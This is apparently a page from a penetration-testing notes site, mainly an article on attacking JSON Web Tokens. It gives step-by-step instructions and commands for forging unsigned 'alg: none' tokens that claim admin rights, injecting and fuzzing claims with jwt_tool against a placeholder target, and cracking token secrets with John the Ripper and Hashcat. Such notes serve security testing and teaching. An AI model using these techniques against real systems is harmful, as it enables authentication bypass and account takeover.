Pentest Notes
Pentest Notes

Exploits related to Web

Method

HTTP Rate Limit Bypass
Virtual Hosts (VHOSTS) Enumeration
WAF (Web Application Firewall) Detection
Web Basic Pentesting
Web Content Discovery
Web Login Bypass

Security Risk

Blind XXE
Broken Access Control
Business Logic Attack
CORS (Cross-Origin Resource Sharing) Attack
CRLF (Carriage Return Line Feed) Injection
CSRF (Cross-Site Request Forgery)
Directory (Path) Traversal
File Inclusion (LFI/RFI)
File Upload Attack
HTTP Request Smuggling
IDOR (Insecure Direct Object References) Attack
Insecure Deserialization
JSON.NET Deserialization
NoSQL Injection
Node.js Deserialization Attack
OAuth Attack
OS Command Injection
Open Redirect
PHP Filters Chain
PHP Object Injection
Prototype Pollution in Client-Side
Prototype Pollution in Server-Side
Redis SSRF
SQL Injection Cheat Sheet
SQL Injection with Sqlmap
SSRF (Server-Side Request Forgery)
SSTI (Server-Side Template Injection)
XSS (Cross-Site Scripting)
XSS with Dynamic PDF
XST (Cross-Site Tracing)
XXE (XML External Entity)
wkhtmltopdf SSRF

Cookie

Cookie Hijacking
Session Fixation

CMS

Bolt CMS Pentesting
CMS (Content Management System) Pentesting
Cockpit CMS Pentesting
Concrete CMS Pentesting
FUEL CMS Pentesting
Joomla CMS Pentesting
Mara CMS Pentesting
Subrion CMS Pentesting
TYPO3 Pentesting
WordPress Pentesting

Framework

AJP (Apache JServ Protocol) Pentesting
Angular Pentesting
Apache Struts Pentesting
Django Pentesting
Flask Jinja2 Pentesting
Python Pickle RCE
Spring Cloud Function RCE
Spring Pentesting
Werkzeug Pentesting

Template Engine

JsRender Template Injection
Pug Pentesting

API

API Pentesting
GraphQL Pentesting

Cloud

AWS (Amazon Web Services) Pentesting
Spring Cloud Function RCE

Microsoft

Microsoft Exchange Server Pentesting

Tool

How to Use Burp Suite
How to Use OWASP ZAP

Others

Apache ActiveMQ Pentesting
Apache Tomcat Pentesting
Apache Zeppelin Pentesting
Atlassian Confluence Pentesting
Browser in the Browser (BITB) Attack
CGI Pentesting
Cacti Pentesting
ClipBucket Pentesting
Code Deobfuscation
Codiad Pentesting
Dompdf RCE
Dump Git Repository from Website
Grafana Pentesting
HashiCorp Consul Pentesting
JBOSS Pentesting
JWT (Json Web Token) Pentesting
Java RMI Pentesting
Jenkins Pentesting
LimeSurvey Pentesting
Log4j Pentesting
OpenCATS Pentesting
PHP Srand Time Abusing
PHP hash_hmac Bypass
Restaurant Management System (RMS) Pentesting
TeamCity Pentesting
Tiny File Manager Pentesting
Web Browser Settings for Pentesting
Web PHP Pentesting
WebAnno Pentesting
WebDAV Pentesting
WebSocket Pentesting
Webmin Pentesting

JWT (Json Web Token) Pentesting

Last modified: 2023-03-26

Web

JWT is a proposed internet standard for creating data with optional signature and optional encryption whose payload holds JSON that asserts some number of claims.

Decode JWT

  • There are some online JWT decoder/encoder tools like JWT.io.
  • CyberChef can be used for JWT decode.

Manipulate JWT

If the website uses JWT and we can see the token, copy the JWT and paste it in jwt.io.

  1. Replace the "alg" value with "none" in header. (try the alg header variations such as "none", "None", "nOnE", "NONE".)
  2. Replace arbitrary values of the payload e.g. "username" with "admin".
  3. Empty the signature field.

If the error "Invalid Signature" occured, we can manually create Base64 value for each section (remove the "=" symbol).
If you want to empty the signature field manually, you can delete the final section.
For example,

eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJ1c2VybmFtZSI6ImFkbWluIiwiZXhwIjoxNjc4NDYwNjM1fQ.

Now copy the JWT.
Go to the website and replace the original JWT with the new one in HTTP header.

Update Expiration

If we don’t get the results we expect, try to increase the "exp" value as below.

"exp": 1679156071 -> 991679156071

Automation

JWT Toolkit is a toolkit for testing, tweaking and cracking JWT.

Decode

python jwt_tool.py <Base64_Encoded_JWT>

Scan

# -t: Target URL
# -rc: Cookies
# -M pb: Playbook Scan Mode
# -cv: Canary Value
python jwt_tool.py -t https://vulnerable.com/admin -rc "jwt=<Base64_Encoded_JWT>;anothercookie=test" -M pb -cv "not authorized"

Exploit

# -X i: Exploit (inject inline)
# -I -pc username -pv admin: Inject Claim ("username": admin)
python jwt_tool.py -t https://vulnerable.com/admin -rc "jwt=<Base64_Encoded_JWT>;anothercookie=test" -X i -I -pc username -pv admin

Fuzz

# -I -hc kid -hv wordlist.txt: Inject Claim ("kid": FUZZ)
python jwt_tool.py -t https://vulnerable.com/admin -rc "jwt=<Base64_Encoded_JWT>;anothercookie=test" -I -hc kid -hv wordlist.txt

Manual Pentesting

# Tamper (Manual Exploit)
python jwt_tool.py <Base64_Encoded_JWT> -T

# Exploit (Automated Exploit)
# -X a: Exploit (alg: none)
python jwt_tool.py <Base64_Encoded_JWT> -X a

Crack JWT Secret

First of all, you need to put the JWT into the text file.

echo -n '<Base64_Encoded_JWT>' > jwt.txt

Then crack the hash using John the Ripper or Hashcat.

john --format=HMAC-SHA256 --wordlist=/usr/share/wordlists/rockyou.txt jwt.txt

hashcat -a 0 -m 16500 jwt.txt passwords.txt
hashcat -a 0 -m 16500 jwt.txt passwords.txt -r rules/best64.rule
hashcat -a 3 -m 16500 jwt.txt '?u?l?l?l?l?l?l?l' -i --increment-min=6

If you found a secret, you can create a new JWT using the secret on tools like JWT.io.

Also we can use jwt-cracker.

Twitter GitHub